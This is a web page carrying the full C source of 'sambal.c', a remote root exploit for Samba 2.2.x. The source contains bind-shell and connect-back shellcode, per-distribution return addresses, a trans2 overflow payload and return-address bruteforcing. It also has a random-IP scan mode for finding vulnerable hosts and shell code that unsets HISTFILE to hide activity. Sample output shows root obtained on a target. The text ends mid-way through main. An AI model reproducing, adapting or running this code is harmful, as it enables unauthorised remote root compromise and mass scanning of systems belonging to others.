Samba 2.2.8 < remote root exploit - sambal.c

    
 
     * Version TXT Disponible ici *
                              
                              /*
                              Remote root exploit for Samba 2.2.x and prior that works against 
                              Linux (all distributions), FreeBSD (4.x, 5.x), NetBSD (1.x) and 
                              OpenBSD (2.x, 3.x and 3.2 non-executable stack). 
                              sambal.c is able to identify samba boxes. It will send a netbios
                              name packet to port 137. If the box responds with the mac address
                              00-00-00-00-00-00, it's probally running samba.

                              [esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0
                              samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
                              --------------------------------------------------------------
                              + Scan mode.
                              + [192.168.0.3] Samba
                              + [192.168.0.10] Windows
                              + [192.168.0.20] Windows
                              + [192.168.0.21] Samba
                              + [192.168.0.30] Windows
                              + [192.168.0.31] Samba
                              + [192.168.0.33] Windows
                              + [192.168.0.35] Windows
                              + [192.168.0.36] Windows
                              + [192.168.0.37] Windows
                              ...
                              + [192.168.0.133] Samba

                              Great!
                              You could now try a preset (-t0 for a list), but most of the 
                              time bruteforce will do. The smbd spawns a new process on every 
                              connect, so we can bruteforce the return address...

                              [esdee@embrace esdee]$ ./sambal -b 0 -v 192.168.0.133
                              samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
                              --------------------------------------------------------------
                              + Verbose mode.
                              + Bruteforce mode. (Linux)
                              + Using ret: [0xbffffed4]
                              + Using ret: [0xbffffda8]
                              + Using ret: [0xbffffc7c]
                              + Using ret: [0xbffffb50]
                              + Using ret: [0xbffffa24]
                              + Using ret: [0xbffff8f8]
                              + Using ret: [0xbffff7cc]
                              + Worked!
                              --------------------------------------------------------------
                              Linux LittleLinux.selwerd.lan 2.4.18-14 #1 Wed Sep 4 11:57:57 EDT 2002 i586
                              i586 i386 GNU/Linux
                              uid=0(root) gid=0(root) groups=99(nobody)

                              sambal.c : samba-2.2.8 < remote root exploit by eSDee (www.netric.org|

                              */

                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 

                              typedef struct {
                              unsigned char type;
                              unsigned char flags;
                              unsigned short length;
                              } NETBIOS_HEADER;

                              typedef struct {
                              unsigned char protocol[4];
                              unsigned char command;
                              unsigned short status;
                              unsigned char reserved;
                              unsigned char  flags;
                              unsigned short flags2;
                              unsigned char  pad[12];
                              unsigned short tid;
                              unsigned short pid;
                              unsigned short uid;
                              unsigned short mid;
                              } SMB_HEADER;

                              int OWNED = 0;
                              pid_t childs[100];
                              struct sockaddr_in addr1;
                              struct sockaddr_in addr2;

                              char
                              linux_bindcode[] =
                              "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
                              "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50"
                              "\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02"
                              "\x52\x51\x89\xca\x89\xe1\xb0\x66\xcd\x80\x31\xdb\x39\xc3\x74\x05"
                              "\x31\xc0\x40\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
                              "\x80\x89\xd7\x31\xc0\x31\xdb\x31\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
                              "\x80\x31\xc0\x31\xdb\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
                              "\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x40\x31\xc0"
                              "\x89\xfb\xb0\x06\xcd\x80\x31\xc0\x31\xc9\x89\xf3\xb0\x3f\xcd\x80"
                              "\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"
                              "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8b\x54\x24"
                              "\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0"
                              "\x89\xf3\xb0\x06\xcd\x80\xeb\x99";

                              char
                              bsd_bindcode[] =
                              "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
                              "\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02"
                              "\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80"
                              "\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57"
                              "\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89"
                              "\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
                              "\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
                              "\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56"
                              "\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
                              "\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f"
                              "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b"
                              "\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80"
                              "\xeb\x9a";

                              char
                              linux_connect_back[] =
                              "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
                              "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51"
                              "\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3"
                              "\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
                              "\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
                              "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
                              "\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f"
                              "\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
                              "\x01\xcd\x80"; 

                              char
                              bsd_connect_back[] =
                              "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
                              "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef"
                              "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0"
                              "\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80"
                              "\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52"
                              "\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31"
                              "\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"
                              "\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";



                              struct {
                              char *type;
                              unsigned long ret;
                              char *shellcode;
                              int os_type;    /* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec 
                              stack */

                              } targets[] = {
                              { "samba-2.2.x - Debian 3.0           ", 0xbffffea2, linux_bindcode,
                              0 },
                              { "samba-2.2.x - Gentoo 1.4.x         ", 0xbfffe890, linux_bindcode,   
                              0 },
                              { "samba-2.2.x - Mandrake 8.x         ", 0xbffff6a0, linux_bindcode,
                              0 },
                              { "samba-2.2.x - Mandrake 9.0         ", 0xbfffe638, linux_bindcode,
                              0 },
                              { "samba-2.2.x - Redhat 9.0           ", 0xbffff7cc, linux_bindcode,   
                              0 },
                              { "samba-2.2.x - Redhat 8.0           ", 0xbffff2f0, linux_bindcode, 
                              0 },
                              { "samba-2.2.x - Redhat 7.x           ", 0xbffff310, linux_bindcode, 
                              0 },
                              { "samba-2.2.x - Redhat 6.x           ", 0xbffff2f0, linux_bindcode, 
                              0 },
                              { "samba-2.2.x - Slackware 9.0        ", 0xbffff574, linux_bindcode,
                              0 },
                              { "samba-2.2.x - Slackware 8.x        ", 0xbffff574, linux_bindcode,   
                              0 },
                              { "samba-2.2.x - SuSE 7.x             ", 0xbffffbe6, linux_bindcode,  
                              0 }, 
                              { "samba-2.2.x - SuSE 8.x             ", 0xbffff8f8, linux_bindcode,   
                              0 },
                              { "samba-2.2.x - FreeBSD 5.0          ", 0xbfbff374, bsd_bindcode,     
                              1 },
                              { "samba-2.2.x - FreeBSD 4.x          ", 0xbfbff374, bsd_bindcode,
                              1 },
                              { "samba-2.2.x - NetBSD 1.6           ", 0xbfbfd5d0, bsd_bindcode,
                              1 },
                              { "samba-2.2.x - NetBSD 1.5           ", 0xbfbfd520, bsd_bindcode,     
                              1 },
                              { "samba-2.2.x - OpenBSD 3.2          ", 0x00159198, bsd_bindcode,
                              2 },
                              { "samba-2.2.8 - OpenBSD 3.2 (package)", 0x001dd258, bsd_bindcode,     
                              2 },
                              { "samba-2.2.7 - OpenBSD 3.2 (package)", 0x001d9230, bsd_bindcode,     
                              2 },
                              { "samba-2.2.5 - OpenBSD 3.2 (package)", 0x001d6170, bsd_bindcode,     
                              2 },
                              { "Crash (All platforms)              ", 0xbade5dee, linux_bindcode,
                              0 },
                              };

                              void shell();
                              void usage();
                              void handler();

                              int is_samba(char *ip, unsigned long time_out);
                              int Connect(int fd, char *ip, unsigned int port, unsigned int time_out);
                              int read_timer(int fd, unsigned int time_out);
                              int write_timer(int fd, unsigned int time_out);
                              int start_session(int sock);
                              int exploit_normal(int sock, unsigned long ret, char *shellcode);
                              int exploit_openbsd32(int sock, unsigned long ret, char *shellcode);

                              void 
                              usage(char *prog)
                              {
                              fprintf(stderr, "Usage: %s [-bBcCdfprsStv] [host]\n\n"
                              "-b    bruteforce (0 = Linux, 1 = FreeBSD/Net
                              BSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\n"
                              "-B        bruteforce steps (default = 300)\n"
                              "-c  connectback ip address\n"
                              "-C  max childs for scan/bruteforce mode (d
                              efault = 40)\n"
                              "-d       bruteforce/scanmode delay in micro sec
                              onds (default = 100000)\n"
                              "-f              force\n" 
                              "-p        port to attack (default = 139)\n"
                              "-r         return address\n"
                              "-s              scan mode (random)\n"
                              "-S     scan mode\n"
                              "-t        presets (0 for a list)\n" 
                              "-v              verbose mode\n\n", prog);

                              exit(1);
                              }

                              int
                              is_samba(char *ip, unsigned long time_out)
                              {
                              char
                              nbtname[]= /* netbios name packet */
                              {
                              0x80,0xf0,0x00,0x10,0x00,0x01,0x00,0x00,
                              0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,
                              0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
                              0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
                              0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
                              0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,
                              0x00,0x01
                              };

                              unsigned char recv_buf[1024];
                              unsigned char *ptr;

                              int i = 0;
                              int s = 0;

                              unsigned int total = 0;

                              if ((s = socket(PF_INET, SOCK_DGRAM, 17)) <= 0) return -1;

                              if(Connect(s, ip, 137, time_out) == -1) {
                              close(s);
                              return -1;
                              } 

                              memset(recv_buf, 0x00, sizeof(recv_buf));

                              if(write_timer(s, time_out) == 1) {
                              if (write(s, nbtname, sizeof(nbtname)) <= 0) {
                              close(s);
                              return -1;
                              }
                              }

                              if (read_timer(s, time_out) == 1) {
                              if (read(s, recv_buf, sizeof(recv_buf)) <= 0) {
                              close(s);
                              return -1;
                              }

                              ptr = recv_buf + 57;
                              total = *(ptr - 1); /* max names */

                              while(ptr < recv_buf + sizeof(recv_buf)) {
                              ptr += 18;
                              if (i == total) {

                                ptr -= 19;                      

                                if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 &
                              & *(ptr + 3) == 0x00 &&
                                     *(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 &
                              & *(ptr + 6) == 0x00) {
                                        close(s);
                                        return 0;
                                }

                                close(s);
                                return 1;
                              }

                              i++;    
                              }

                              }
                              close(s);
                              return -1;
                              }

                              int 
                              Connect(int fd, char *ip, unsigned int port, unsigned int time_out) 
                              {
                              /* ripped from no1 */

                              int                      flags;
                              int                      select_status;
                              fd_set                   connect_read, connect_write;
                              struct timeval           timeout;
                              int                      getsockopt_length = 0;
                              int                      getsockopt_error = 0;
                              struct sockaddr_in       server;
                              bzero(&server, sizeof(server));
                              server.sin_family = AF_INET;
                              inet_pton(AF_INET, ip, &server.sin_addr);
                              server.sin_port = htons(port);

                              if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
                              close(fd);
                              return -1;
                              }

                              if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
                              close(fd);
                              return -1;
                              }

                              timeout.tv_sec = time_out;
                              timeout.tv_usec = 0;
                              FD_ZERO(&connect_read);
                              FD_ZERO(&connect_write);
                              FD_SET(fd, &connect_read);
                              FD_SET(fd, &connect_write);

                              if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) {
                              if(errno != EINPROGRESS) {
                              close(fd);
                              return -1;
                              }
                              }
                              else {
                              if(fcntl(fd, F_SETFL, flags) < 0) {
                              close(fd);
                              return -1;
                              }

                              return 1;

                              }

                              select_status = select(fd + 1, &connect_read, &connect_write, NULL, &ti
                              meout);

                              if(select_status == 0) {
                              close(fd);
                              return -1;

                              }

                              if(select_status == -1) {
                              close(fd);
                              return -1;
                              }

                              if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) {
                              if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write))
                              {
                              getsockopt_length = sizeof(getsockopt_error);

                              if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_err
                              or, &getsockopt_length) < 0) {
                                errno = ETIMEDOUT;
                                close(fd);
                                return -1;
                              }

                              if(getsockopt_error == 0) {
                                if(fcntl(fd, F_SETFL, flags) < 0) {
                                        close(fd);
                                        return -1;
                                }
                                return 1;
                              } 

                              else {
                                errno = getsockopt_error;
                                close(fd);
                                return (-1);
                                }

                              }
                              }
                              else {
                              close(fd);
                              return 1;
                              }

                              if(fcntl(fd, F_SETFL, flags) < 0) {
                              close(fd);
                              return -1;
                              }
                              return 1;
                              }

                              int 
                              read_timer(int fd, unsigned int time_out)
                              {

                              /* ripped from no1 */

                              int                      flags;
                              int                      select_status;
                              fd_set                   fdread;
                              struct timeval           timeout;

                              if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
                              close(fd);
                              return (-1);
                              }

                              if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
                              close(fd);
                              return (-1);
                              }

                              timeout.tv_sec = time_out;
                              timeout.tv_usec = 0;
                              FD_ZERO(&fdread);
                              FD_SET(fd, &fdread);
                              select_status = select(fd + 1, &fdread, NULL, NULL, &timeout);

                              if(select_status == 0) {
                              close(fd);
                              return (-1);
                              }

                              if(select_status == -1) {
                              close(fd);
                              return (-1);
                              }

                              if(FD_ISSET(fd, &fdread)) {

                              if(fcntl(fd, F_SETFL, flags) < 0) {
                              close(fd);
                              return -1;
                              }

                              return 1;

                              } 
                              else {
                              close(fd);
                              return 1;

                              }
                              }

                              int
                              write_timer(int fd, unsigned int time_out)
                              {

                              /* ripped from no1 */

                              int                      flags;
                              int                      select_status;
                              fd_set                   fdwrite;
                              struct timeval           timeout;

                              if((flags = fcntl(fd, F_GETFL, 0)) < 0) {    
                              close(fd);
                              return (-1);
                              }

                              if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
                              close(fd);
                              return (-1);
                              }

                              timeout.tv_sec = time_out;
                              timeout.tv_usec = 0;
                              FD_ZERO(&fdwrite);
                              FD_SET(fd, &fdwrite);

                              select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout);

                              if(select_status == 0) {
                              close(fd);
                              return -1;
                              }

                              if(select_status == -1) {
                              close(fd);
                              return -1;
                              }

                              if(FD_ISSET(fd, &fdwrite)) {
                              if(fcntl(fd, F_SETFL, flags) < 0) {
                              close(fd);
                              return -1;
                              }
                              return 1;
                              }
                              else { 
                              close(fd);
                              return -1;
                              }
                              }


                              void 
                              shell(int sock)
                              {
                              fd_set  fd_read;
                              char buff[1024], *cmd="unset HISTFILE; echo \"*** JE MOET JE MUIL HOUWE
                              \";uname -a;id;\n";
                              int n;

                              FD_ZERO(&fd_read);
                              FD_SET(sock, &fd_read);
                              FD_SET(0, &fd_read);

                              send(sock, cmd, strlen(cmd), 0);

                              while(1) {
                              FD_SET(sock,&fd_read);
                              FD_SET(0,&fd_read);

                              if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break;

                              if (FD_ISSET(sock, &fd_read)) {

                              if((n = recv(sock, buff, sizeof(buff), 0)) < 0){
                                fprintf(stderr, "EOF\n");
                                exit(2);
                              }

                              if (write(1, buff, n) < 0) break;
                              }

                              if (FD_ISSET(0, &fd_read)) {

                              if((n = read(0, buff, sizeof(buff))) < 0){
                                fprintf(stderr, "EOF\n");
                                exit(2);
                              }

                              if (send(sock, buff, n, 0) < 0) break;
                              }

                              usleep(10);
                              }

                              fprintf(stderr, "Connection lost.\n\n");
                              exit(0);
                              }

                              void
                              handler()
                              {
                              int sock = 0;
                              int i = 0;
                              OWNED = 1;

                              for (i = 0; i < 100; i++)
                              if (childs[i] != 0xffffffff) waitpid(childs[i], NULL, 0);

                              if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
                              close(sock);
                              exit(1);
                              }

                              if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {
                              fprintf(stdout, "+ Worked!\n"
                                "----------------------------------------------
                              ----------------\n");
                              shell(sock);
                              close(sock);
                              }


                              }

                              int 
                              start_session(int sock)
                              {
                              char buffer[1000];
                              char response[4096];
                              char session_data1[]    = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00
                              \x00\x00\x00";
                              char session_data2[]    = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25
                              \x6e\x6f\x62\x6f\x64\x79"
                                  "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24
                              ";

                              NETBIOS_HEADER  *netbiosheader;
                              SMB_HEADER      *smbheader;

                              memset(buffer, 0x00, sizeof(buffer));

                              netbiosheader   = (NETBIOS_HEADER *)buffer;
                              smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

                              netbiosheader->type     = 0x00;         /* session message */
                              netbiosheader->flags    = 0x00;
                              netbiosheader->length   = htons(0x2E);

                              smbheader->protocol[0]  = 0xFF;
                              smbheader->protocol[1]  = 'S';
                              smbheader->protocol[2]  = 'M';
                              smbheader->protocol[3]  = 'B';
                              smbheader->command      = 0x73;         /* session setup */
                              smbheader->flags        = 0x08;         /* caseless pathnames */
                              smbheader->flags2       = 0x01;         /* long filenames supported */
                              smbheader->pid          = getpid() & 0xFFFF;
                              smbheader->uid          = 100;
                              smbheader->mid          = 0x01;

                              memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_da
                              ta1, sizeof(session_data1) - 1);

                              if(write_timer(sock, 3) == 1)
                              if (send(sock, buffer, 50, 0) < 0) return -1;

                              memset(response, 0x00, sizeof(response));

                              if (read_timer(sock, 3) == 1)
                              if (read(sock, response, sizeof(response) - 1) < 0) return -1;

                              netbiosheader = (NETBIOS_HEADER *)response;
                              smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));

                              if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non sess
                              ion message\n");

                              netbiosheader   = (NETBIOS_HEADER *)buffer;
                              smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

                              memset(buffer, 0x00, sizeof(buffer));

                              netbiosheader->type     = 0x00;         /* session message */
                              netbiosheader->flags    = 0x00;
                              netbiosheader->length   = htons(0x3C);

                              smbheader->protocol[0]  = 0xFF;
                              smbheader->protocol[1]  = 'S';
                              smbheader->protocol[2]  = 'M';
                              smbheader->protocol[3]  = 'B';
                              smbheader->command      = 0x70;         /* start connection */
                              smbheader->pid          = getpid() & 0xFFFF;
                              smbheader->tid          = 0x00;
                              smbheader->uid          = 100;

                              memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_da
                              ta2, sizeof(session_data2) - 1);

                              if(write_timer(sock, 3) == 1)
                              if (send(sock, buffer, 64, 0) < 0) return -1;

                              memset(response, 0x00, sizeof(response));

                              if (read_timer(sock, 3) == 1)
                              if (read(sock, response, sizeof(response) - 1) < 0) return -1;

                              netbiosheader = (NETBIOS_HEADER *)response;
                              smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));

                              if (netbiosheader->type != 0x00) return -1;

                              return 0;
                              }

                              int
                              exploit_normal(int sock, unsigned long ret, char *shellcode)
                              {

                              char buffer[4000];
                              char exploit_data[] =
                              "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x
                              00\x00\x00"
                              "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x
                              00\x00\x00\x00" 
                              "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x
                              00\x00\x00\x00"
                              "\x00\x00\x00\x90";

                              int i = 0;
                              unsigned long dummy = ret - 0x90;

                              NETBIOS_HEADER  *netbiosheader;
                              SMB_HEADER      *smbheader;

                              memset(buffer, 0x00, sizeof(buffer));

                              netbiosheader   = (NETBIOS_HEADER *)buffer;
                              smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

                              netbiosheader->type             = 0x00;         /* session message */
                              netbiosheader->flags            = 0x04;
                              netbiosheader->length           = htons(2096);

                              smbheader->protocol[0]          = 0xFF;
                              smbheader->protocol[1]          = 'S';
                              smbheader->protocol[2]          = 'M';
                              smbheader->protocol[3]          = 'B';
                              smbheader->command              = 0x32;         /* SMBtrans2 */
                              smbheader->tid                  = 0x01;
                              smbheader->uid                  = 100;

                              memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(ex
                              ploit_data), 0x90, 3000);

                              buffer[1096] = 0xEB;
                              buffer[1097] = 0x70;

                              for (i = 0; i < 4 * 24; i += 8) {
                              memcpy(buffer + 1099 + i, &dummy, 4);
                              memcpy(buffer + 1103 + i, &ret,   4);
                              }

                              memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), 
                              exploit_data, sizeof(exploit_data) - 1);
                              memcpy(buffer + 1800, shellcode, strlen(shellcode));

                              if(write_timer(sock, 3) == 1) {
                              if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
                              return 0;
                              }

                              return -1;
                              }

                              int
                              exploit_openbsd32(int sock, unsigned long ret, char *shellcode)
                              {
                              char buffer[4000];

                              char exploit_data[] =
                              "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x
                              00\x00\x00"
                              "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x
                              00\x00\x00\x00"
                              "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x
                              00\x00\x00\x00"
                              "\x00\x00\x00\x90";

                              int i = 0;
                              unsigned long dummy = ret - 0x30;
                              NETBIOS_HEADER  *netbiosheader;
                              SMB_HEADER      *smbheader;

                              memset(buffer, 0x00, sizeof(buffer));

                              netbiosheader   = (NETBIOS_HEADER *)buffer;
                              smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

                              netbiosheader->type             = 0x00;         /* session message */
                              netbiosheader->flags            = 0x04;
                              netbiosheader->length           = htons(2096);

                              smbheader->protocol[0]          = 0xFF;
                              smbheader->protocol[1]          = 'S';
                              smbheader->protocol[2]          = 'M';
                              smbheader->protocol[3]          = 'B';
                              smbheader->command              = 0x32;         /* SMBtrans2 */
                              smbheader->tid                  = 0x01;
                              smbheader->uid                  = 100;

                              memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(ex
                              ploit_data), 0x90, 3000);

                              for (i = 0; i < 4 * 24; i += 4)
                              memcpy(buffer + 1131 + i, &dummy, 4);

                              memcpy(buffer + 1127, &ret,      4);

                              memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
                              exploit_data, sizeof(exploit_data) - 1);

                              memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode))
                              ;

                              if(write_timer(sock, 3) == 1) {
                              if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
                              return 0;
                              }

                              return -1;
                              }


                              int
                              main (int argc,char *argv[])
                              {
                              char *shellcode = NULL;
                              char scan_ip[256];

                              int brute       = -1;
                              int connectback = 0;
                              int force       = 0;
                              int i           = 0;
                              int ip1         = 0;
                              int ip2         = 0;
                              int ip3         = 0;
                              int ip4         = 0;
                              int opt         = 0;
                              int port        = 139;
                              int random      = 0;
                              int scan        = 0;
                              int sock        = 0;
                              int sock2       = 0;
                              int status      = 0;
                              int type        = 0;
                              int verbose     = 0;

                              unsigned long BRUTE_DELAY       = 100000;
                              unsigned long ret               = 0x0;
                              unsigned long MAX_CHILDS        = 40;
                              unsigned long STEPS             = 300;

                              struct hostent          *he;

                              fprintf(stdout, "samba-2.2.8 < remote root exploit by eSDee (www.netric
                              .org|be)\n"
                              "------------------------------------------------------
                              --------\n");

                              while((opt = getopt(argc,argv,"b:B:c:C:d:fp:r:sS:t:v")) !=EOF) {
                              switch(opt) 
                              {
                              case 'b':
                                brute = atoi(optarg);
                                if ((brute < 0) || (brute > 3)) {
                                        fprintf(stderr, "Invalid platform.\n\n"
                              );
                                        return -1;
                                }
                                break;
                              case 'B':
                                STEPS = atoi(optarg);
                                if (STEPS == 0) STEPS++;
                                break;
                              case 'c':
                                sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3,
                              &ip4);
                                connectback = 1;

                                if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == 
                              0) {
                                        fprintf(stderr, "Invalid IP address.\n\
                              n");
                                        return -1;
                                }

                                linux_connect_back[33] = ip1; bsd_connect_back[
                              24] = ip1;
                                linux_connect_back[34] = ip2; bsd_connect_back[
                              25] = ip2;
                                linux_connect_back[35] = ip3; bsd_connect_back[
                              26] = ip3;
                                linux_connect_back[36] = ip4; bsd_connect_back[
                              27] = ip4;

                                break;
                              case 'C':
                                MAX_CHILDS = atoi(optarg);
                                if (MAX_CHILDS == 0) {
                                        fprintf(stderr, "Invalid number of chil
                              ds.\n");
                                        return -1;
                                }

                                if (MAX_CHILDS > 99) {
                                        fprintf(stderr, "Too many childs, using
                              99. \n");
                                        MAX_CHILDS = 99;
                                }

                                break;
                              case 'd':
                                BRUTE_DELAY = atoi(optarg);
                                break;
                              case 'f':
                                force = 1;
                                break;
                              case 'p':
                                port = atoi(optarg);
                                if ((port <= 0) || (port > 65535)) {
                                        fprintf(stderr, "Invalid port.\n\n");
                                        return -1;
                                }
                                break;
                              case 'r':
                                ret = strtoul(optarg, &optarg, 16);
                                break;
                              case 's':
                                random  = 1;
                                scan    = 1;
                                break;
                              case 'S':
                                random  = 0;
                                scan    = 1;
                                sscanf(optarg, "%d.%d.%d", &ip1, &ip2, &ip3);
                                ip3--;
                                break;
                              case 't':
                                type = atoi(optarg);
                                if (type == 0 || type > sizeof(targets) / 16) {
                                        for(i = 0; i < sizeof(targets) / 16; i+
                              +)
                                                fprintf(stdout, "%02d. %s      
                              [0x%08x]\n", i + 1,

                                                                targets[i].type
                              , (unsigned int) targets[i].ret);
                                        fprintf(stderr, "\n");
                                        return -1;
                                }
                                break;
                              case 'v':
                                verbose = 1;
                                break;
                              default:
                                usage(argv[0] == NULL ? "sambal" : argv[0]);
                                break;
                              }

                              }

                              if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 &&
                              scan == 0)) 
                              usage(argv[0] == NULL ? "sambal" : argv[0]);

                              if (scan == 1) 
                              fprintf(stdout, "+ Scan mode.\n");
                              if (verbose == 1)
                              fprintf(stdout, "+ Verbose mode.\n");

                              if (scan == 1) {

                              srand(getpid());

                              while (1) {

                              if (random == 1) {
                                ip1 = rand() % 255;
                                ip2 = rand() % 255;
                                ip3 = rand() % 255; } 
                              else {
                                ip3++;
                                if (ip3 > 254) { ip3 = 1; ip2++; }
                                if (ip2 > 254) { ip2 = 1; ip1++; }
                                if (ip1 > 254) exit(0);
                              }

                              for (ip4 = 0; ip4 < 255; ip4++) {
                                i++;
                                snprintf(scan_ip, sizeof(scan_ip) - 1, "%u.%u.%
                              u.%u", ip1, ip2, ip3, ip4);
                                usleep(BRUTE_DELAY);

                                switch (fork()) {
                                        case 0:
                                                switch(is_samba(scan_ip, 2)) {
                                                        case 0:
                                                                fprintf(stdout,
                              "+ [%s] Samba\n", scan_ip);
                                                                break;
                                                        case 1:
